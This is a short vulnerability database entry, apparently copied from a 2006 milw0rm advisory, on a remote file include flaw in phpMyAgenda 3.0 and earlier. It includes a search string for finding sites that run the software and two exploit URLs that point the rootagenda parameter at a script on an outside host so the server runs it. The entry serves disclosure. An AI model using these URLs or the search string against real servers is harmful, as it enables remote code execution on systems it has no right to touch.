phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

phpMyAgenda <= 3.0 Final Remote File Include Vulnerability, discovered by 'Aesthetico', allows remote attackers to execute arbitrary code


                                                Title: phpMyAgenda &#60;=3.0 Final - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: phpMyAgenda
URL: http://phpmyagenda.com
-----------------------------------------------------------------

Credits:
Discovered by: &#39;Aesthetico&#39;
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: &#34;Powered by phpMyAgenda&#34;
-----------------------------------------------------------------

Exploitation:

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?

# milw0rm.com [2006-04-30]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1